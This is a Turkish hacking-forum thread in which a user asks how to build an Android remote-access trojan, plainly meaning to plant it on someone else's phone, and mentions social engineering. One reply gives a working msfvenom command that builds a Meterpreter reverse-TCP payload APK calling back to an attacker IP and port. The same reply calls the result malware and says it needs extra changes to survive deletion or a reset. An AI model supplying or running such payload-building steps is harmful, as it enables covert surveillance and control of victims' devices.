Android İçin RAT Nasıl Yapılır?

umitkoo

Yeni üye
12 Kas 2022
6
1
31
Beyler belki şaka gibi gelebilir ama tam 3 gündür android için rat nasıl yapılır diye araştırıyorum gimediğim delik kalmadı ya video kaldırılmış oluyo ya da bir tanesinin yapımını buluyorum kendim yapamıyorum herhalde bir kişi artık Android RAT nasıl yapılır bu konunun altına detaylı anlatımı varsa bırakırsa gerçekten çok mutlu olurum şimdiden teşekkürler...
 

umitkoo

Yeni üye
12 Kas 2022
6
1
31
Dimi hocam portu açıp buildi atıyorsun adama hemencecik düşüyor böyle tak diye. Zaten millet de eşşekti hemen yiyecek.
Bunun fudu var sosyal mühendisliği var. Böyle basitçe anlatmayın lütfen.
Evet hocam haklısınız bende biraz araştırdım bir kaç tane uygulama denedim fakat bir sonuca ulaşamadım rica etsem yardımcı olabilir misiniz bu konuda bana hangi uygulamayı nasıl kuracağım hakkında
 

umitkoo

Yeni üye
12 Kas 2022
6
1
31
Hocam tool kullanmak istiyorum bir kaç tane deneme yaptım windows üzerinden ama bir sonuca ulaşamadım linux işletim sistemi de sanal makine olarak açık ordan da deneyebilirim eğer şu anda stabil çalışan bir rat varsa yapabileceğim yardımcı olduğunuz için şimdiden teşekkürler fakat hala bir sonuca varamadım.
 

#root

Yeni üye
15 Mar 2022
44
8
Windows üzerinde çalışan birkaç android için rat mevcut idi.Kali Linux da terminale "msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.58 LPORT=4444 R > payload.apk" diyerek android için malware oluşturabilirsiniz.Bu malware silindiğinde,cihaza reset atıldığı vakit vs. bağlantının gitmemesi için bi takım değişiklikler yapılması gerekiyor.Onuda hiçkimse gelipte açık açık anlatmaz.Kendin araştırıp öğrenmen gerekiyor.Yabancı kaynaklara bakmanı öneririm.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.